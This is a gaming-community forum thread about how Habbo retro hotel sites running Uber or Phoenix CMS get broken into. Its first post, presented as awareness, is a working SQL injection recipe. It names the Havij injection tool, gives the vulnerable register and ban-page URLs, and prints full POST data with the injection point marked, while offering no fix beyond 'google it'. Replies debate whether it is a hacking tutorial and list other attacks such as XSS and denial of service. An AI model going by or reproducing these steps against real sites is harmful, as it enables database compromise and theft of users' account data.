Welcome to the RaGEZONE - MMORPG development forums.

How your hotel gets "hacked"....

This is a discussion on How your hotel gets "hacked".... within the Habbo Tutorials forums, part of the Habbo Hotel category; I really do enjoy pissing on the bonfire's of "l33t nubs" and especially the almighty "Zejew" Zecrew*. So here is ...

LyncusMU
Results 1 to 14 of 14
  1. #1
    Flame the flamer
    Rank
    Alpha Member
    Join Date
    Aug 2008
    Location
    The sofa
    Posts
    2,230
    Liked
    133

    How your hotel gets "hacked"....

    Tabo Hotel
    I really do enjoy pissing on the bonfire's of "l33t nubs" and especially the almighty "Zejew" Zecrew*.
    So here is how your phoenix and or uber hotel's gets exploited, through the register page.
    // THIS IS NOT A HACKING TUTORIAL, JUST SHOWING YOU WHAT HAPPENS ON AN UNSECURE CMS.

    Firstly, you require a program called "Havij".
    It is a specialised sql inejction program, that basically does all the querys for you.
    You also require the "POST data" for uber exploits.
    To exploit on uber(If vulnerable), you must first check the register page type.
    If using the old register, with green shit use the following url.
    (http://www.site.com/register_submit)
    The post data is...

    bean.avatarName=%Inject_Here%&bean.password=lawl123&bean.retypedPassword=lawl123&bean.email=aelkrwlawr%40awrlawr.com&bean.day=13&bean.month=7&bean.year=1979&bean.parentEmail=&recaptcha_challenge_field=03AHJ_Vusdlhnu-boAW_CfwD97Y3AiIhbdW_KVUI0EfuKsSnteQK3OhdZMrv-yQ1LOW6Ve_83WZBpLpy0It4IIPjK79w4K519N6VLtJ4F94_ERYh3Ci50M9I8LSgHKqT5vKyytcX_VZsaPDvaVnXYXaaKoiPM4_1BqbA&recaptcha_response_field=menticlo+plus&bean.tos=accept

    If using the new register, AKA Quick register use the following url.
    (http://www.site.com/quickregister/email_password_submit)

    And the post data-
    bean.name=%Inject_Here%&bean.email=[email protected]&bean.password=lawl123&bean.retypedPassword=lawl123&bean.termsOfServiceSelection=accept


    For phoenix the url must be
    (http://site.com/index.php?error=ban&user=%Inject_Here%)
    and set to "Get".


    For a tutorial on patching it, google is your way forward.
    Simply search "patch sql injection vuln".

    And for any "l33t" nubs reading this, your not so l33t now that everyone knows this simple exploit

  2. HostKey.com: Unmetered Dedicated servers in the Netherlands
  3. #2
    Developer & Designer
    Rank
    Member +
    Join Date
    Feb 2010
    Location
    Planet Earth
    Posts
    548
    Liked
    265

    Re: How your hotel gets "hacked"....

    Solution = RevCMS

  4. #3
    CF Web Developer
    Rank
    Member +
    Join Date
    Dec 2010
    Location
    Lincoln, UK
    Posts
    1,077
    Liked
    408

    Re: How your hotel gets "hacked"....

    Rofl, *Cough* who told you this ;).

  5. #4
    Account Upgraded | Title Enabled!
    Rank
    Member +
    Join Date
    Jun 2009
    Location
    Netherlands
    Posts
    812
    Liked
    121

    Re: How your hotel gets "hacked"....

    Quote Originally Posted by SuperNoob View Post
    It kinda is a hacking tutorial cause in the thread itself it doesn't show how to patch it. It gives instructions on where to find how to patch it.
    100% true, plus i hate how its out of range and then the whole thread is messed-.-

  6. #5
    RaGEZONER
    Rank
    Newbie
    Join Date
    Aug 2009
    Location
    England
    Posts
    79
    Liked
    0

    Re: How your hotel gets "hacked"....

    Cant find the link to a patch. fml.

  7. #6
    Flame the flamer
    Rank
    Alpha Member
    Join Date
    Aug 2008
    Location
    The sofa
    Posts
    2,230
    Liked
    133

    Re: How your hotel gets "hacked"....

    Quote Originally Posted by SuperNoob View Post
    It kinda is a hacking tutorial cause in the thread itself it doesn't show how to patch it. It gives instructions on where to find how to patch it.
    I don't run around for people here. No-one nowadays provides anything useful for me so why should I?
    Besides, if your not going to event ry and get your hotel patched, then why the hell should I spoon feed it to you all.
    And one more thing, the title says "How your hotel gets hacked". Not "How to prevent...".
    Jesus christ Mithex, I would of thought that even you could of understood that?

    And siem, If your so assed about my thread's layout then go re design it for me, and send me it via pm. If you do, your one sad mofo.

  8. #7
    RaGEZONER
    Rank
    Newbie
    Join Date
    Feb 2011
    Posts
    80
    Liked
    5

    Re: How your hotel gets "hacked"....

    For the record its impossible to have a cms that's not exploitable

  9. #8
    /title
    Rank
    Member +
    Join Date
    Mar 2011
    Posts
    1,033
    Liked
    146

    Re: How your hotel gets "hacked"....

    I'm sure the owners of their hotel would know this. If they had a brain to develop a retro, they must have a brain to know the basics of how your hotel gets hacked.

    Good guide, I'm sure this will help a lot of retro owners.

  10. #9
    Average Member
    Rank
    Newbie
    Join Date
    Aug 2011
    Location
    Australia
    Posts
    71
    Liked
    3

    Re: How your hotel gets "hacked"....

    Hotels only get hacked because of the CMS they're using like PhoenixPHP that's easy to hack

  11. #10
    RaGEZONER
    Rank
    Newbie
    Join Date
    Feb 2011
    Posts
    80
    Liked
    5

    Re: How your hotel gets "hacked"....

    Interesting

  12. #11
    Flame the flamer
    Rank
    Alpha Member
    Join Date
    Aug 2008
    Location
    The sofa
    Posts
    2,230
    Liked
    133

    Re: How your hotel gets "hacked"....

    There is thousands of ways to bring down site's and hotel's.
    xss injection (possible in uber)
    Denial of service (a cowards way out)
    Shell's (a four year olds weapon)

    The list goes on.

  13. #12
    CF Web Developer
    Rank
    Member +
    Join Date
    Dec 2010
    Location
    Lincoln, UK
    Posts
    1,077
    Liked
    408

    Re: How your hotel gets "hacked"....

    Precisely.

    By using PhoenixPHP, now, you're simply saying; "Hax0rz me PL0X <3" to ZeJew.

  14. #13
    SQL Master. :)
    Rank
    Subscriber
    Join Date
    Apr 2011
    Location
    Matrix World.
    Posts
    987
    Liked
    170

    Re: How your hotel gets "hacked"....

    mhm - Would find any expliots . :L Nice -

  15. #14
    MEHHREKHwhgfkehrkgthregir
    Rank
    Member +
    Join Date
    Sep 2011
    Location
    υηιтє∂
    Posts
    907
    Liked
    300

    Re: How your hotel gets "hacked"....

    If you wish to patch these exploits simply look in the Habbo Release section and you will see I have patched them.

 

 

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •